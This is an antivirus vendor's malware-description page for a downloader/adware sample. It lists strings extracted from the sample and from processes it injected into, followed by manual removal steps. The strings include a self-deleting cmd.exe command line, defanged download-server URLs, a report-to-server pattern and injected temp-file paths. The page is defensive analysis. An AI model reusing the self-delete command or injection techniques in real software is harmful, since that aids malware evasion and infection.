comctl32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Dmfcm120u.dll
dshell32.dll
ED2D1.dll
DWrite.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
lXXxXXXXXXXX
combase.dll
Fmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
cmd.exe /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "%s"
cmd.exe /C timeout 3 > Nul & Del "%s"
hXXp://megadowl.com/terms-ru.html
All files (*.*)
r.ico
. Component url:
chrome
firefox
s.lnk
\amigo.exe
application/exe
application/x-dosexec
WINDOWS
\\.\PhysicalDrive%d
Advapi32.dll
x-x-x-x-x-x
oIphlpapi.dll
hXXp://
explorer.exe
_Label_Url_
Wininet.dll
ntdll.dll
C:\Windows\TEMP\INJ98A6.tmp
Citizen_Cope.mp3
1340951093
C:\Download
5.5.4
cubeload.ru
request/report?
&key=
User-Agent: /Content-Type: application/x-www-form-urlencoded
\\.\PhysicalDrive
ÞSKTOP%
%DOWNLAODS%
windows
downloads!hXXp://megadowl.com/terms-ru.html
HKLM\Software\WineYHKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\ProgIdNHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\regexp:.*\DisplayName
file_url
file_url_domain
send_report_type
reg_key
ReportStart failed
ReportClose failed
ReportFinish failed
ReportComponent failed
by url:
Failed executing file:
report_delay
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS?HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version
. File URL:
HKEY_CURRENT_USER\Software\Wine HKEY_LOCAL_MACHINE\Software\Wine,SOFTWARE\Microsoft\Windows NT\CurrentVersion
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]

iexplore.exe_2100:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

iexplore.exe_1952:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

SearchProtocolHost.exe_552:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_3076:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

Explorer.EXE_520_rwx_00BC0000_00001000:

C:\Windows\TEMP\INJ8027.tmp

Explorer.EXE_520_rwx_00BD0000_00001000:

C:\Windows\TEMP\INJ98A6.tmp


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    INJ8027.tmp:3744
    VRT7944.tmp:3276
    VRT903E.tmp:2244

  3. Delete the original Virus file.
  4. Delete or disinfect the following files created/modified by the Virus:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\normal_bg[1].jpg (1160 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\appImg[1].jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\nvlinfad[1] (630 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\Default[1] (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\toccolor[1] (522 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\icw[1] (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\icwhd2[1] (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\icw[1] (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\hm_globe[1] (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\linefade_hrz[1] (85 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\arrow_dwn[1] (49 bytes)
    C:\Windows\Temp\INJ8027.tmp (1 bytes)
    C:\Windows\Temp\INJ98A6.tmp (1 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now